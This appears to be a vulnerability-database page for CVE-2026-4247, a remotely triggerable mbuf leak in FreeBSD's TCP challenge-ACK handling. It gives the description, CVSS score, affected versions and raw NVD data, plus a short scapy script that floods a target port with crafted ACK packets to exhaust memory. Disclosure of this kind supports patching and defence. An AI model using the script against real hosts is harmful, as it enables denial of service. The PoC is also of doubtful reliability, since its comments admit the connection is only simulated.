Security Vulnerability Report
中文
CVE-2026-4247 CVSS 7.5 HIGH

CVE-2026-4247

Published: 2026-03-26 07:16:20
Last Modified: 2026-04-30 18:55:51
Source: [email protected]

Description

When a challenge ACK is to be sent tcp_respond() constructs and sends the challenge ACK and consumes the mbuf that is passed in. When no challenge ACK should be sent the function returns and leaks the mbuf. If an attacker is either on path with an established TCP connection, or can themselves establish a TCP connection, to an affected FreeBSD machine, they can easily craft and send packets which meet the challenge ACK criteria and cause the FreeBSD host to leak an mbuf for each crafted packet in excess of the configured rate limit settings i.e. with default settings, crafted packets in excess of the first 5 sent within a 1s period will leak an mbuf. Technically, off-path attackers can also exploit this problem by guessing the IP addresses, TCP port numbers and in some cases the sequence numbers of established connections and spoofing packets towards a FreeBSD machine, but this is harder to do effectively.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:freebsd:freebsd:14.3:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:freebsd:freebsd:14.3:p1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:freebsd:freebsd:14.3:p2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:freebsd:freebsd:14.3:p3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:freebsd:freebsd:14.3:p4:*:*:*:*:*:* - VULNERABLE
FreeBSD (具体受影响版本请参考FreeBSD-SA-26:06.tcp通告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for CVE-2026-4247 (FreeBSD TCP mbuf leak) # This script sends crafted TCP packets to potentially trigger the mbuf leak. # Usage: python3 poc.py <target_ip> <target_port> import sys from scapy.all import IP, TCP, send, RandShort def trigger_mbuf_leak(target_ip, target_port): print(f"[*] Sending packets to {target_ip}:{target_port} ...") # Establish a connection first (simulated) # Here we assume a port is open or we are on-path. # We send a burst of packets with old sequence numbers to trigger Challenge ACK logic. src_port = RandShort() # Craft a packet with a sequence number likely out of window to provoke Challenge ACK # Note: Actual exploitation requires specific timing and sequence prediction. pkt = IP(dst=target_ip)/TCP(sport=src_port, dport=target_port, flags="A", seq=1000, ack=1000) # Send a burst to exceed rate limit (default 5/sec) for i in range(100): send(pkt, verbose=0) # Optional: slight delay to avoid immediate network blocking, but fast enough for burst print("[+] Attack packet burst sent.") print("[!] Monitor target memory usage (mbuf usage) for signs of leak.") if __name__ == "__main__": if len(sys.argv) != 3: print("Usage: python3 poc.py <target_ip> <target_port>") sys.exit(1) trigger_mbuf_leak(sys.argv[1], int(sys.argv[2]))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4247", "sourceIdentifier": "[email protected]", "published": "2026-03-26T07:16:20.387", "lastModified": "2026-04-30T18:55:51.180", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When a challenge ACK is to be sent tcp_respond() constructs and sends the challenge ACK and consumes the mbuf that is passed in. When no challenge ACK should be sent the function returns and leaks the mbuf.\n\nIf an attacker is either on path with an established TCP connection, or can themselves establish a TCP connection, to an affected FreeBSD machine, they can easily craft and send packets which meet the challenge ACK criteria and cause the FreeBSD host to leak an mbuf for each crafted packet in excess of the configured rate limit settings i.e. with default settings, crafted packets in excess of the first 5 sent within a 1s period will leak an mbuf.\n\nTechnically, off-path attackers can also exploit this problem by guessing the IP addresses, TCP port numbers and in some cases the sequence numbers of established connections and spoofing packets towards a FreeBSD machine, but this is harder to do effectively."}, {"lang": "es", "value": "Cuando se debe enviar un ACK de desafío, tcp_respond() construye y envía el ACK de desafío y consume el mbuf que se le pasa. Cuando no se debe enviar ningún ACK de desafío, la función retorna y fuga el mbuf.\n\nSi un atacante está en la ruta de una conexión TCP establecida, o puede establecer una conexión TCP por sí mismo, a una máquina FreeBSD afectada, puede fácilmente crear y enviar paquetes que cumplen los criterios del ACK de desafío y hacer que el host FreeBSD fugue un mbuf por cada paquete creado en exceso de la configuración del límite de velocidad configurado, es decir, con la configuración predeterminada, los paquetes creados en exceso de los primeros 5 enviados dentro de un período de 1s fugarán un mbuf.\n\nTécnicamente, los atacantes fuera de ruta también pueden explotar este problema adivinando las direcciones IP, los números de puerto TCP y en algunos casos los números de secuencia de las conexiones establecidas y suplantando paquetes hacia una máquina FreeBSD, pero esto es más difícil de hacer de manera efectiva."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:-:*:*:*:*:*:*", "matchCriteriaId": "9DC7C54E-58AF-4ADE-84AF-0EF0F325E20E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p1:*:*:*:*:*:*", "matchCriteriaId": "D3D22B8C-36CF-4800-9673-0B0240558BDD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p2:*:*:*:*:*:*", "matchCriteriaId": "242FA2A8-5D7D-4617-A411-2651FF3A3E4C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p3:*:*:*:*:*:*", "matchCriteriaId": "40573F60-F3B7-4AEC-846A-B08E5B7D9D00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p4:*:*:*:*:*:*", "matchCriteriaId": "1FB832CE-0A98-44A2-8BAC-CD38A64279B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p5:*:*:*:*:*:*", "matchCriteriaId": "9A785F8E-C218-41AE-8D57-BF06DDAEF7CB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p6:*:*:*:*:*:*", "matchCriteriaId": "C3909FDD-B2A2-45B6-A40B-1D303A717F15"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p7:*:*:*:*:*:*", "matchCriteriaId": "720597A2-F181-46E1-8A0D-097E17ADC4FB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p8:*:*:*:*:*:*", "matchCriteriaId": "DC8A75D0-148A-427A-9783-45477EABED21"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p9:*:*:*:*:*:*", "matchCriteriaId": "F5D39FC9-6DBA-46C8-BB80-A6188E6A8527"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.4:-:*:*:*:*:*:*", "matchCriteriaId": "8F3856BE-666F-4FA1-A6AD-FE179CEBF1E4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.4:rc1:*:*:*:*:*:*", "matchCriteriaId": "0342A715-E211-4AF6-97ED-32EB9EBB947D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:15.0:-:*:*:*:*:*:*", "matchCriteriaId": "368CFE5D-C5C2-42AF-AAF4-28DFE1A59C3B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:15.0:p1:*:*:*:*:*:*", "matchCriteriaId": "AA4AAA57-70A7-4717-ACF2-A253E757FF2C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:f ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.